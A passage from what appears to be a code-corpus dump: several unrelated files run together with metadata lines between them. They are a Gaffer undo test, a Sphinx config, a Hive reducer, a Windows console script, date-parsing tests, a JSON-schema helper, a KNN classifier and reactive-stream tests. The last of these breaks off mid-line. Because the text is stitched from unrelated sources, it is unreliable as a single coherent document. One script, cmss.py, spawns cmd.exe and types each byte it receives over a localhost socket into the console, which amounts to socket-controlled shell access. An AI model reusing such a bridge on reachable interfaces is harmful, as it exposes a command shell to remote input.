GafferTest.AddNode() s.addChild( n1 ) s.addChild( n2 ) s.addChild( n3 ) n2["op1"].setInput( n1["sum"] ) n2["op2"].setInput( n1["sum"] ) n3["op1"].setInput( n2["sum"] ) n3["op2"].setInput( n2["sum"] ) self.assert_( n2["op1"].getInput().isSame( n1["sum"] ) ) self.assert_( n2["op2"].getInput().isSame( n1["sum"] ) ) self.assert_( n3["op1"].getInput().isSame( n2["sum"] ) ) self.assert_( n3["op2"].getInput().isSame( n2["sum"] ) ) with Gaffer.UndoContext( s ) : s.deleteNodes( filter = Gaffer.StandardSet( [ n2 ] ) ) self.assertEqual( n2["op1"].getInput(), None ) self.assertEqual( n2["op2"].getInput(), None ) self.assert_( n3["op1"].getInput().isSame( n1["sum"] ) ) self.assert_( n3["op2"].getInput().isSame( n1["sum"] ) ) s.undo() self.assert_( n2["op1"].getInput().isSame( n1["sum"] ) ) self.assert_( n2["op2"].getInput().isSame( n1["sum"] ) ) self.assert_( n3["op1"].getInput().isSame( n2["sum"] ) ) self.assert_( n3["op2"].getInput().isSame( n2["sum"] ) ) with Gaffer.UndoContext( s ) : s.deleteNodes( filter = Gaffer.StandardSet( [ n2 ] ), reconnect = False ) self.assertEqual( n2["op1"].getInput(), None ) self.assertEqual( n2["op2"].getInput(), None ) self.assertEqual( n3["op1"].getInput(), None ) self.assertEqual( n3["op2"].getInput(), None ) s.undo() self.assert_( n2["op1"].getInput().isSame( n1["sum"] ) ) self.assert_( n2["op2"].getInput().isSame( n1["sum"] ) ) self.assert_( n3["op1"].getInput().isSame( n2["sum"] ) ) self.assert_( n3["op2"].getInput().isSame( n2["sum"] ) ) def testDisable( self ) : s = Gaffer.ScriptNode() s["n"] = GafferTest.AddNode() with Gaffer.UndoContext( s, Gaffer.UndoContext.State.Disabled ) : s["n"]["op1"].setValue( 10 ) self.assertFalse( s.undoAvailable() ) with Gaffer.UndoContext( s, Gaffer.UndoContext.State.Enabled ) : with Gaffer.UndoContext( s, Gaffer.UndoContext.State.Disabled ) : s["n"]["op1"].setValue( 20 ) self.assertFalse( s.undoAvailable() ) if __name__ == "__main__": unittest.main()
bsd-3-clause
4,500,557,016,804,750,300
30.502703
77
0.644132
false
bjmorgan/vasppy
docs/source/conf.py
1
5544
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # vasppy documentation build configuration file, created by # sphinx-quickstart on Tue Mar 6 13:36:30 2018. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # import os import sys sys.path.insert(0, os.path.abspath('../../')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.coverage', 'sphinx.ext.mathjax', 'sphinx.ext.viewcode', 'sphinx.ext.githubpages', 'sphinx.ext.napoleon', 'nbsphinx'] autoclass_content = 'both' # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The master toctree document. master_doc = 'index' # General information about the project. project = 'vasppy' copyright = '2018, Benjamin J. Morgan' author = 'Benjamin J. Morgan' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '0.4' # The full version, including alpha/beta/rc tags. release = '0.4' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = ['_build', '**.ipynb_checkpoints'] # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # If true, the current module name will be prepended to all description # unit titles (such as .. function::). add_module_names = False # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} nbsphinx_prompt_width = 0 # NbSphinx configuration nbsphinx_execute = 'never' nbsphinx_codecell_lexer = 'python3' # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. 
They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Custom sidebar templates, must be a dictionary that maps document names # to template names. # # This is required for the alabaster theme # refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars html_sidebars = { '**': [ 'relations.html', # needs 'show_related': True theme option to display 'searchbox.html', ] } # -- Options for HTMLHelp output ------------------------------------------ # Output file base name for HTML help builder. htmlhelp_basename = 'vasppydoc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'vasppy.tex', 'vasppy Documentation', 'Benjamin J. Morgan', 'manual'), ] # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'vasppy', 'vasppy Documentation', [author], 1) ] # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'vasppy', 'vasppy Documentation', author, 'vasppy', 'One line description of project.', 'Miscellaneous'), ]
mit
-909,140,408,415,588,900
28.647059
79
0.675866
false
intel-hadoop/Big-Data-Benchmark-for-Big-Bench
engines/hive/queries/q08/q08_filter_sales_with_reviews_viewed_before.py
1
3144
#"INTEL CONFIDENTIAL" #Copyright 2016 Intel Corporation All Rights Reserved. # #The source code contained or described herein and all documents related to the source code ("Material") are owned by Intel Corporation or its suppliers or licensors. Title to the Material remains with Intel Corporation or its suppliers and licensors. The Material contains trade secrets and proprietary and confidential information of Intel or its suppliers and licensors. The Material is protected by worldwide copyright and trade secret laws and treaty provisions. No part of the Material may be used, copied, reproduced, modified, published, uploaded, posted, transmitted, distributed, or disclosed in any way without Intel's prior express written permission. # #No license under any patent, copyright, trade secret or other intellectual property right is granted to or conferred upon you by disclosure or delivery of the Materials, either expressly, by implication, inducement, estoppel or otherwise. Any license under such intellectual property rights must be express and approved by Intel in writing. import sys import logging import traceback import os import time from time import strftime web_page_type_filter=sys.argv[1] seconds_before_sale_filter = long(sys.argv[2]) if __name__ == "__main__": line = '' try: current_key = '' last_review_date=-1 #sales_sk should be distinct last_sales_sk = '' #expects input to be partitioned by uid and sorted by date_sk (and timestamp) ascending for line in sys.stdin: # lustered by wcs_user_sk and by wcs_user_sk, tstamp_inSec_str, wcs_sales_sk, wp_type ascending in this order => ensured by hive wcs_user_sk, tstamp_inSec_str, wcs_sales_sk, wp_type = line.strip().split("\t") #reset on partition change if current_key != wcs_user_sk : current_key = wcs_user_sk last_review_date = -1 last_sales_sk = '' tstamp_inSec = long(tstamp_inSec_str) #found review before purchase, save last review date if wp_type == web_page_type_filter: last_review_date = tstamp_inSec continue #if we encounter a sold item ( wcs_sales_sk.isdigit() => valid non null value) and a user looked at a review within 'seconds_before_sale_filter' => print found sales_sk backt to hive #if last_review_date > 0 and (tstamp_inSec - last_review_date) <= seconds_before_sale_filter and wcs_sales_sk.isdigit() : #version with duplicate sales_sk's if last_review_date > 0 and (tstamp_inSec - last_review_date) <= seconds_before_sale_filter and wcs_sales_sk.isdigit() and last_sales_sk != wcs_sales_sk : #version reduced duplicate sales_sk's last_sales_sk = wcs_sales_sk print wcs_sales_sk except: ## should only happen if input format is not correct, like 4 instead of 5 tab separated values logging.basicConfig(level=logging.DEBUG, filename=strftime("/tmp/bigbench_q8_reducer_%Y%m%d-%H%M%S.log")) logging.info('web_page_type_filter: ' + web_page_type_filter ) logging.info('seconds_before_sale_filter: ' + seconds_before_sale_filter ) logging.info("line from hive: \"" + line + "\"") logging.exception("Oops:") raise sys.exit(1)
apache-2.0
-7,692,260,263,573,723,000
51.4
663
0.735687
false
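The reducer above expects rows pre-clustered by user and sorted by timestamp on stdin, so it can be smoke-tested locally by piping a few hand-made rows through it. All values below are fabricated, and 'review' stands in for the page-type filter (Python 2, matching the reducer):

# Feed three fabricated rows: u1 reads a review at t=100 and buys item 7 at
# t=150 (within the 90-second window); u2 buys item 9 with no prior review.
import subprocess

rows = ["u1\t100\t0\treview",
        "u1\t150\t7\tdynamic",
        "u2\t200\t9\tdynamic"]
proc = subprocess.Popen(
    ["python", "q08_filter_sales_with_reviews_viewed_before.py", "review", "90"],
    stdin=subprocess.PIPE, stdout=subprocess.PIPE)
out, _ = proc.communicate("\n".join(rows) + "\n")
print(out)  # expected: only '7' is printed back to hive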
viswimmer1/PythonGenerator
data/python_files/34574373/cmss.py
1
2623
import win32pipe import win32console import win32process import time import win32con import codecs import ctypes user32 = ctypes.windll.user32 CONQUE_WINDOWS_VK = { '3' : win32con.VK_CANCEL, '8' : win32con.VK_BACK, '9' : win32con.VK_TAB, '12' : win32con.VK_CLEAR, '13' : win32con.VK_RETURN, '17' : win32con.VK_CONTROL, '20' : win32con.VK_CAPITAL, '27' : win32con.VK_ESCAPE, '28' : win32con.VK_CONVERT, '35' : win32con.VK_END, '36' : win32con.VK_HOME, '37' : win32con.VK_LEFT, '38' : win32con.VK_UP, '39' : win32con.VK_RIGHT, '40' : win32con.VK_DOWN, '45' : win32con.VK_INSERT, '46' : win32con.VK_DELETE, '47' : win32con.VK_HELP } def make_input_key(c, control_key_state=None): kc = win32console.PyINPUT_RECORDType (win32console.KEY_EVENT) kc.KeyDown = True kc.RepeatCount = 1 cnum = ord(c) if cnum == 3: pid_list = win32console.GetConsoleProcessList() win32console.GenerateConsoleCtrlEvent(win32con.CTRL_C_EVENT, 0) return else: kc.Char = unicode(c) if str(cnum) in CONQUE_WINDOWS_VK: kc.VirtualKeyCode = CONQUE_WINDOWS_VK[str(cnum)] else: kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum) #kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum+96) #kc.ControlKeyState = win32con.LEFT_CTRL_PRESSED return kc #win32console.AttachConsole() coord = win32console.PyCOORDType con_stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE) con_stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE) flags = win32process.NORMAL_PRIORITY_CLASS si = win32process.STARTUPINFO() si.dwFlags |= win32con.STARTF_USESHOWWINDOW (handle1, handle2, i1, i2) = win32process.CreateProcess(None, "cmd.exe", None, None, 0, flags, None, '.', si) time.sleep(1) #size = con_stdout.GetConsoleScreenBufferInfo()['Window'] # with codecs.open("log.txt", "w", "utf8") as f: # for i in xrange(0, size.Bottom): # f.write(con_stdout.ReadConsoleOutputCharacter(size.Right+1, coord(0, i))) # f.write("\n") import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) HOST = "127.0.0.1" PORT = 5554 s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((HOST, PORT)) s.listen(1) (sc, scname) = s.accept() while True: msg = sc.recv(1) if ord(msg) == 0: break keys = [make_input_key(msg)] if keys: con_stdin.WriteConsoleInput(keys) win32process.TerminateProcess(handle1, 0)
gpl-2.0
1,044,929,001,205,104,300
26.846154
109
0.643157
false
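The script above listens on 127.0.0.1:5554 and turns each received byte into a console key event, stopping on a NUL byte. A minimal client-side sketch (pure stdlib, Python 2; the command text is arbitrary):

# Send a command, press Enter (\r maps to VK_RETURN in CONQUE_WINDOWS_VK),
# then a NUL byte to end the server's receive loop.
import socket

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("127.0.0.1", 5554))
for ch in "dir\r":
    client.send(ch)    # the server reads one byte per key event
client.send("\x00")    # ord(msg) == 0 breaks the server loop
client.close()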
airanmehr/bio
Scripts/TimeSeriesPaper/Plot/topSNPs.py
1
1589
''' Copyleft Oct 14, 2016 Arya Iranmehr, PhD Student, Bafna Lab, UC San Diego, Email: [email protected] ''' import numpy as np; np.set_printoptions(linewidth=200, precision=5, suppress=True) import pandas as pd; pd.options.display.max_rows = 20; pd.options.display.expand_frame_repr = False import seaborn as sns import matplotlib as mpl import os; home = os.path.expanduser('~') + '/' import Utils.Util as utl import Scripts.TimeSeriesPaper.RealData.Utils as rutl a = rutl.loadAllScores().groupby(level='h', axis=1).apply(rutl.HstatisticAll) df = pd.read_pickle(utl.outpath + 'real/scores.df') i = df.lrd.sort_values().index[-1] df.loc[i] cd = pd.read_pickle(utl.outpath + 'real/CD.F59.df') import Utils.Plots as pplt import pylab as plt names = rutl.loadSNPIDs() sns.set_style("white", {"grid.color": "0.9", 'axes.linewidth': .5, "grid.linewidth": "9.99"}) mpl.rc('font', **{'family': 'serif', 'serif': ['Computer Modern']}); mpl.rc('text', usetex=True) reload(pplt) f, ax = plt.subplots(1, 2, sharey=True, dpi=300, figsize=(4, 2)) i = a[0.5].sort_values().index[-1] sns.set_context("notebook", font_scale=1, rc={"lines.linewidth": 1.2}) pplt.plotSiteReal(cd.loc[i], ax=ax[0], legend=True) ax[0].set_title('{}:{:.0f} ({})'.format(i[0], i[1], names.loc[i]), fontsize=8) i = df.lrdiff.sort_values().index[-1] pplt.plotSiteReal(cd.loc[i], ax=ax[1]) sns.set_context("notebook", font_scale=1, rc={"lines.linewidth": 1.2}) ax[1].set_title('{}:{:.0f} ({})'.format(i[0], i[1], names.loc[i]), fontsize=8) plt.gcf().subplots_adjust(bottom=0.2) pplt.savefig('topSNPs', 300) plt.show()
mit
2,218,888,666,753,329,700
32.104167
102
0.680302
false
edx/edx-load-tests
util/generate_summary.py
1
3450
# -*- coding: utf-8 -*- """ Generate a summary of a previous loadtest run in this environment. See for usage example in a jenkins job dsl: https://github.com/edx/jenkins-job-dsl/blob/master/testeng/jobs/loadtestDriver.groovy Prerequisites: A logfile produced by util/run-loadtest.sh should be present in its standard location. Output: Produces summary on standard output in YAML format. The structure is as follows: * monitoring_links: * list of link text/url pairs pointing to monitoring dashboards. * timeline: * begin: ISO 8601 date for when the test began. * end: ISO 8601 date for when the test ended. """ from datetime import timedelta import yaml import helpers.markers from util.app_monitors_config import MONITORS # Refer to util/run-loadtest.sh in case this file path changes. STANDARD_LOGFILE_PATH = "results/log.txt" def parse_logfile_events(logfile): """ Parse the logfile for events Parameters: logfile (file): the file containing locust logs for a single load test Returns: iterator of (datetime.datetime, str) tuples: the parsed events in the order they are encountered. """ for line in logfile: data = helpers.markers.parse_logfile_event_marker(line) if data is not None: yield (data['time'], data['event']) def get_time_bounds(logfile): """ Determine when the load test started and stopped. Parameters: logfile (file): the file containing locust logs for a single load test Returns: two-tuple of datetime.datetime: the time bounds of the load test """ begin_time = end_time = None relevant_events = ['locust_start_hatching', 'edx_heartbeat', 'quitting'] relevant_times = [ time for time, event in parse_logfile_events(logfile) if event in relevant_events ] begin_time, end_time = (min(relevant_times), max(relevant_times)) return (begin_time, end_time) def main(): """ Generate a summary of a previous load test run. This script assumes "results/log.txt" is the logfile in question. """ with open(STANDARD_LOGFILE_PATH) as logfile: loadtest_begin_time, loadtest_end_time = get_time_bounds(logfile) monitoring_links = [] for monitor in MONITORS: monitoring_links.append({ 'url': monitor.url( begin_time=loadtest_begin_time, end_time=loadtest_end_time, ), 'text': u'{}: {} ({} — {})'.format( monitor.monitoring_service_name, monitor.app_name, # We use naive datetimes (i.e. no attached tz) and just # assume UTC all along. Tacking on the "Z" implies UTC. loadtest_begin_time.strftime('%Y-%m-%dT%H:%M:%SZ'), loadtest_end_time.strftime('%Y-%m-%dT%H:%M:%SZ'), ), }) print(yaml.dump( { 'timeline': { 'begin': loadtest_begin_time.strftime('%Y-%m-%dT%H:%M:%SZ'), 'end': loadtest_end_time.strftime('%Y-%m-%dT%H:%M:%SZ'), }, 'monitoring_links': monitoring_links }, default_flow_style=False, # Represent objects using indented blocks # rather than inline enclosures. allow_unicode=True, )) if __name__ == "__main__": main()
apache-2.0
-6,008,860,902,320,476,000
30.345455
85
0.606729
false
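Per the module docstring above, the summary is printed as YAML with a sorted top level (yaml.dump sorts keys), so monitoring_links precedes timeline. An illustrative sample of the output shape; the dashboard name, URL and timestamps are invented:

# Approximate shape of the emitted summary (illustration only).
SAMPLE_OUTPUT = """\
monitoring_links:
- text: 'NewRelic: lms (2017-03-01T12:00:00Z — 2017-03-01T13:30:00Z)'
  url: https://dashboard.example.invalid/?begin=1488369600&end=1488375000
timeline:
  begin: '2017-03-01T12:00:00Z'
  end: '2017-03-01T13:30:00Z'
"""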
lmregus/Portfolio
python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/eventloop/coroutine.py
1
3783
from __future__ import unicode_literals import types from prompt_toolkit.eventloop.defaults import get_event_loop from prompt_toolkit.eventloop.future import Future __all__ = [ 'From', 'Return', 'ensure_future', ] def ensure_future(future_or_coroutine): """ Take a coroutine (generator) or a `Future` object, and make sure to return a `Future`. """ if isinstance(future_or_coroutine, Future): return future_or_coroutine elif isinstance(future_or_coroutine, types.GeneratorType): return _run_coroutine(future_or_coroutine) else: raise ValueError('Expecting coroutine or Future object. Got %r: %r' % ( type(future_or_coroutine), future_or_coroutine)) class Return(Exception): """ For backwards-compatibility with Python2: when "return" is not supported in a generator/coroutine. (Like Trollius.) Instead of ``return value``, in a coroutine do: ``raise Return(value)``. """ def __init__(self, value): self.value = value def __repr__(self): return 'Return(%r)' % (self.value, ) def From(obj): """ Used to emulate 'yield from'. (Like Trollius does.) """ return ensure_future(obj) def _run_coroutine(coroutine): """ Takes a generator that can yield Future instances. Example: def gen(): yield From(...) print('...') yield From(...) ensure_future(gen()) The values which are yielded by the given coroutine are supposed to be `Future` objects. """ assert isinstance(coroutine, types.GeneratorType) loop = get_event_loop() result_f = loop.create_future() # Wrap this future in a `_FutureRef`. We need this in order to be able to # break all its references when we're done. This is important # because in case of an exception, we want to be sure that # `result_f.__del__` is triggered as soon as possible, so that we see the # exception. # (If `step_next` had a direct reference to `result_f` and there is a # future that references `step_next`, then sometimes it won't be cleaned up # immediately. - I'm not sure how exactly, but in that case it requires the # garbage collector, because refcounting isn't sufficient.) ref = _FutureRef(result_f) # Loop through the generator. def step_next(f=None): " Execute next step of the coroutine." try: if f is None: new_f = coroutine.send(None) else: exc = f.exception() if exc: new_f = coroutine.throw(exc) else: new_f = coroutine.send(f.result()) except StopIteration: # Stop coroutine. Make sure that a result has been set in the future, # this will call the callbacks. (Also, don't take any result from # StopIteration, it has already been set using `raise Return()`. if not ref.future.done(): ref.future.set_result(None) ref.forget() except Return as e: ref.future.set_result(e.value) ref.forget() except BaseException as e: ref.future.set_exception(e) ref.forget() else: # Process yielded value from coroutine. assert isinstance(new_f, Future), 'got %r' % (new_f, ) @new_f.add_done_callback def continue_(_): step_next(new_f) # Start processing coroutine. step_next() return result_f class _FutureRef(object): def __init__(self, future): self.future = future def forget(self): " Forget reference. " self.future = None
mit
911,875,866,142,147,300
29.02381
81
0.591594
false
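The docstrings above spell out the Trollius-style protocol: a child coroutine is awaited with yield From(...) and "returns" by raising Return(value). A sketch of both halves, assuming a prompt_toolkit event loop is available to drive the futures:

# Python-2-compatible coroutine sketch using the helpers defined above.
from prompt_toolkit.eventloop.coroutine import From, Return, ensure_future

def add_later(a, b):
    raise Return(a + b)  # the Py2 substitute for 'return a + b'
    yield                # unreachable; only makes this function a generator

def main():
    total = yield From(add_later(2, 3))
    raise Return(total * 10)

future = ensure_future(main())
future.add_done_callback(lambda f: None)  # f.result() would be 50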
bhdouglass/remindor-common
tests/test_time_validation.py
1
1362
import remindor_common.datetimeutil as d

valid_singular = [
    "now",
    "1:00pm",
    "1:00 pm",
    "13:00",
    "13",
    "1300",
    "1pm"
]

valid_repeating = [
    "every hour",
    "every hour from 1 to 1:00pm",
    "every minute",
    "every minute from 2:00pm to 1500",
    "every 3 minutes",
    "every 3 minutes from 3:30pm to 3:45 pm",
    "every 2 hours",
    "every 2 hours from 8 to 10"
]

invalid = [
    "every minute from",
    "asdf",
    "every minutes to 3",
    "2500",
    "25",
    "-1",
    "every -2 minutes",
    "every minute from 5 to 1",
    "every minute from 5 to 5",
    "8/12/13",
    "October 12",
    "7-21-2013"
]

print "testing valid singular times"
for row in valid_singular:
    print "?" + row + "?"
    value = d.str_time_simplify(row)
    print "!" + str(value) + "!"
    if value == None:
        print "value should not be None!"
        exit()
print ""

print "testing valid repeating times"
for row in valid_repeating:
    print "?" + row + "?"
    value = d.str_time_simplify(row)
    print "!" + str(value) + "!"
    if value == None:
        print "value should not be None!"
        exit()
print ""

print "testing invalid times"
for row in invalid:
    print row
    value = d.str_time_simplify(row)
    print value
    if value != None:
        print "value should be None!"
        exit()
gpl-3.0
4,687,957,397,284,547,000
18.73913
45
0.550661
false
jokajak/itweb
data/env/lib/python2.6/site-packages/repoze.what-1.0.9-py2.6.egg/repoze/what/release.py
1
1208
# -*- coding: utf-8 -*- ############################################################################## # # Copyright (c) 2008-2009, Gustavo Narea <[email protected]> # All Rights Reserved. # # This software is subject to the provisions of the BSD-like license at # http://www.repoze.org/LICENSE.txt. A copy of the license should accompany # this distribution. THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL # EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND # FITNESS FOR A PARTICULAR PURPOSE. # ############################################################################## """ repoze.what release information. The version number is loaded to help the Quickstart plugin configure repoze.what correctly, depending on the version available -- although it may be useful on other packages. """ import os _here = os.path.abspath(os.path.dirname(__file__)) _root = os.path.dirname(os.path.dirname(_here)) version = open(os.path.join(_root, 'VERSION.txt')).readline().rstrip() # The major version: If version=='3.0.2rc4', the major version is int(3). major_version = int(version.split('.')[0])
gpl-3.0
-1,875,028,804,024,402,000
35.606061
78
0.639901
false
picleslivre/schemaprobe
schemaprobe.py
1
2343
from __future__ import unicode_literals
import sys
import functools
import json

try:
    import jsonschema
except ImportError:
    jsonschema = None

try:
    import requests
except ImportError:
    requests = None


__version__ = '1.0.0.dev1'
__all__ = ['ensure', 'JsonProbe']


# --------------
# Py2 compat
# --------------
PY2 = sys.version_info[0] == 2

if PY2:
    string_types = (str, unicode)
else:
    string_types = (str,)
# --------------


class JsonProbe(object):
    """
    An instance that knows how to perform validations against json-schema.
    """
    _jsonschema = jsonschema

    def __init__(self, schema):
        """
        :param schema: json-schema as json-encoded text or python datastructures.
        """
        if self._jsonschema is None:
            raise TypeError('Missing dependency `jsonschema`.')

        self.schema = self._normalize_input(schema)

    def validate(self, input):
        """
        Validate `input` against the given schema.

        :param input: json-encoded text or python datastructures.
        :returns: boolean
        """
        data = self._normalize_input(input)

        try:
            jsonschema.validate(data, self.schema)
        except self._jsonschema.ValidationError:
            return False
        else:
            return True

    def _normalize_input(self, input):
        """
        Always return python datastructures.

        :param input: json-encoded text or python datastructures.
        """
        if isinstance(input, string_types):
            return json.loads(input)
        else:
            return input


def ensure(probe):
    """
    Decorator that asserts the returned value is valid against `probe`.
    """
    def ensure_decorator(f):
        @functools.wraps(f)
        def wrapper(*args, **kwargs):
            result = f(*args, **kwargs)
            if probe.validate(result):
                return result
            else:
                raise TypeError('Returned data does not conform with the given schema.')
        return wrapper
    return ensure_decorator


class TestCaseMixin(object):
    def assertSchemaIsValid(self, probe, resource_url, msg=None):
        api_sample = requests.get(resource_url)
        if not probe.validate(api_sample.json()):
            raise self.failureException(msg or 'Schema is invalid.')
bsd-2-clause
1,664,159,037,023,619,000
23.154639
88
0.593683
false
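A short usage sketch for JsonProbe and the ensure decorator above; the schema and the decorated function are invented for illustration (the jsonschema package must be installed):

# Validate return values against a toy schema requiring an "id" key.
from schemaprobe import JsonProbe, ensure

probe = JsonProbe('{"type": "object", "required": ["id"]}')

@ensure(probe)
def get_user():
    return {"id": 7, "name": "ana"}

print(get_user())                          # conforms, so the dict is returned
print(probe.validate('{"name": "ana"}'))   # False: "id" is missing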
sighingnow/sighingnow.github.io
resource/k_nearest_neighbors/dating.py
1
3622
#! /usr/bin/env python
# -*- coding: utf-8

'''
Name: dating.py (KNN algorithm)
Training and test dataset: dating.txt
Created on Feb 8, 2015

@author: Tao He
'''

__author__ = 'Tao He'

from numpy import array as nmarray
from matplotlib import pyplot as plt

LABEL_MAP = {
    'didntLike': 1,
    'smallDoses': 2,
    'largeDoses': 3,
}

ATTR_MAP = {
    1: 'Number of frequent flyer miles earned per year',
    2: 'Percentage of time spent playing video games',
    3: 'Liters of ice cream consumed per week',
}

def create_dataset(filename=None):
    ''' Return data group and labels.

    Get the data from file. If the filename is not specified, return None.

    data format: flyerMiles, gameTime, icecream, label.
    '''

    def normalize_data(data=None):
        ''' Normalize the dataset.

        Scale all data to the range 0-1.
        '''
        if data is None:
            return None
        for column in range(data[0].__len__()):
            max_val, min_val = max(data[:, column]), min(data[:, column])
            for row in range(data.__len__()):
                data[row][column] = (data[row][column]-min_val)/(max_val-min_val)
        return data

    if filename is None:
        return (None, None)

    group = []
    labels = []
    with open(filename, mode='r') as fp_data:
        for line in fp_data:
            group.append([float(num) for num in line[:-1].split('\t')[0:3]])
            labels.append(LABEL_MAP[line[:-1].split('\t')[3]])
    return normalize_data(nmarray(group)), labels

def draw_pic(group=None, labels=None, x=0, y=0):
    ''' Draw a subplot from the data group. '''
    if group is None or labels is None:
        return None
    name = 'knn-dating'
    figure = plt.figure(num=name, dpi=100)
    ax_main = figure.add_subplot(1, 1, 1, xlabel=ATTR_MAP[x+1], ylabel=ATTR_MAP[y+1], title=name)
    ax_main.scatter(group[:, x], group[:, y],
                    s=15*nmarray(labels),
                    c=[[float(i)/LABEL_MAP.__len__()] for i in labels])
    plt.show()
    ## plt.savefig('%s.png'%name, format='png', dpi=100)

def knn_classify(group, labels, attrs, ratio=0.5, item=0, k=3):
    ''' Return the type of item.

    KNN classify function.
    '''

    def get_dist(i, j):
        ''' Return the distance between group[i] and group[j]. '''
        dist = 0.0
        for attr in attrs:
            dist += (group[i][attr]-group[j][attr])*(group[i][attr]-group[j][attr])
        return dist

    length = group.__len__()
    distance = []
    for i in range(int(length*ratio), length):
        distance.append((i, get_dist(item, i)))
    cnt = {}
    distance.sort(key=lambda pair: pair[1])
    for i in range(k):
        label = labels[distance[i][0]]
        if label in cnt:
            cnt[label] += 1
        else:
            cnt[label] = 1
    return sorted(cnt.items(), key=lambda pair: pair[1], reverse=True)[0][0]

def knn():
    ''' KNN classify algorithm. '''
    data, labels = create_dataset('dating.txt')
    ratio, attr = 0.5, [0, 1, 2]
    cnt, cnt_correct = 0, 0
    length = data.__len__()
    for i in range(0, int(length*ratio)):
        cnt += 1
        knn_type = knn_classify(data, labels, attr, ratio, i, 3)
        # print('case[%d]: real: %d, knn: %d'%(i, labels[i], knn_type))
        if knn_type == labels[i]:
            cnt_correct += 1
    print('total: %d, correct: %d, correct ratio: %f'%(cnt, cnt_correct, float(cnt_correct)/cnt))

if __name__ == '__main__':
    knn()

# vim: set sw=4, ts=4, fileencoding=utf-8
mit
8,461,827,833,393,829,000
27.933884
97
0.543622
false
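The normalize_data step above rescales each column with (x - min) / (max - min). A worked one-column example on made-up flyer-mile values:

# Min-max scaling exactly as in normalize_data, on one fabricated column.
column = [8000.0, 40000.0, 72000.0]
min_val, max_val = min(column), max(column)
scaled = [(x - min_val) / (max_val - min_val) for x in column]
print(scaled)  # [0.0, 0.5, 1.0] -- 40000 sits exactly halfway between the extremes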
chexov/rexpython
rexpython/test_observable.py
1
4158
import logging import multiprocessing import sys import time from unittest import TestCase import rexpython as rx logging.basicConfig(format="%(asctime)-15s %(name)-25s %(levelname)s %(process)d %(message)s") log = logging.getLogger(__name__) log.setLevel(logging.DEBUG) class TestOnError(TestCase): def test_onerror(self): def o(em): try: raise ValueError("42") except ValueError: print "GAGA" em.onError(sys.exc_info()) rx.Observable.create(o) \ .doOnError(lambda e: log.debug("failed. good. %s" % str(e))) \ .subscribe(rx.LambdaObserver(on_error=lambda e: log.debug("cool. on_error fired"), on_complete=lambda: self.fail("should fail") )) def test_onerror_multiprocess(self): main_pid = multiprocessing.current_process().pid def o(em): log.error(main_pid) log.error(multiprocessing.current_process().pid) assert main_pid != multiprocessing.current_process().pid try: raise ValueError("42") except ValueError: log.error("GAGA") em.onError(sys.exc_info()) log.debug("hello") d = rx.Observable.create(o) \ .doOnError(lambda e: log.debug("failed. good. %s" % str(e))) \ .subscribeOn(multiprocessing.Process) \ .subscribe(rx.LambdaObserver(on_error=lambda e: log.debug("cool. on_error fired"), on_complete=lambda: self.fail("should fail") )) print ("disp", d) class TestObservable(TestCase): def test_blockingSubscribe(self): d = rx.Observable.from_(xrange(1, 4)).blockingSubscribe( on_next=lambda i: sys.stdout.write("from=%s\n" % i), on_complete=lambda: sys.stdout.write("!! complete\n") ) print d def test_play(self): def ga(i): while True: log.debug("ga %s" % i) time.sleep(1) plist = [] for i in xrange(1, 5): p = multiprocessing.Process(target=ga, args=(i,)) p.start() plist.append(p) for pp in plist: print pp pp.join() print "PLAY" def test_observeOn(self): def emit(emitter): """ :type emitter: 